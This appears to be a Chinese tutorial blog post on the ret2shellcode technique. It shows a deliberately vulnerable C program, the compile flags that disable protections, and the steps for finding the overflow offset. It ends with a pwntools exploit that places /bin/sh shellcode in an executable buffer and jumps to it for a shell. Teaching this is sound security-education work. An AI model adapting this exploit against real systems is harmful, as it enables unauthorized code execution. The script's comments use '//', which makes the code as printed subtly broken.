ret2shellcdoe

ret2shellcode的关键是找到一个缓冲区,这个缓冲区是可读写写可执行的,我们要想办法把我们的shellcdoe放到这个缓冲区,然后跳转到我们的shellcode处执行。

例子:

#include <stdio.h>
#include <string.h>
char str1[0x40];

void func()
{
	char str[0x40];
	read(0,str,0x60);
	strcpy(str1,str);
}
int main()
{
	func();
	return 0;
}

可以看出,read处有溢出

编译:

gcc -no-pie -fno-stack-protector -z execstack -m32 -o 6.exe 6.c

找到溢出点:
用peda生成100个字符,
在这里插入图片描述
溢出查看此时的EIP
在这里插入图片描述
溢出点在76
在这里插入图片描述
找到str1首地址
0x804a060
在这里插入图片描述

写出我们的poc

from pwn import *
context(arch="i386",os="linux")
p=process('./6.exe')
offset = 76		
shellcode=asm(shellcraft.sh())		//生成shellcode代码,这里的shellcode越短越好,长度不能超过溢出的长度76
payload =shellcode.ljust(offset,'\x90')+p32(0x804a060)		//ljust是为了让\x90填充我们的shellcode,让其长度达到760x804a060是str1的首地址,目的是为了跳转到str1首地址,去执行我们的shellcode
pid=proc.pidof(p)
print pid
pause()
p.sendline(payload)
p.interactive()

执行,成功获得权限
在这里插入图片描述

注:
生成shellcdoe方法:
方法1.用pwntool或者peda和msfpc或者msfvenom工具生成,支持上线,最好越短越好
例如用pwntool中的shellcraft.sh(),再转汇编字节码asm()
asm(shellcraft.sh()),程序中我们是利用peda生成的。

方法2.手写,其实网上一搜到处都是,可以直接用,但自己要和前段时间windows一样自己调试提取
就是想办法调用evecve("/bin/sh",null,null);

总结
ret2shellcode的本意是我们在程序当中能找到一块缓冲区,这个缓冲区可读可写可执行,然后想各种办法,把我们的shellcode搞进这个缓冲区,然后到这个缓冲区头部去执行。
像上面的例子中,我们利用栈溢出将我们生成的shellcdoe复制到str1处,str1处可读可写可执行,并且在构造payload中加入了这个str1首地址,到这里去执行我们的shellcode

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值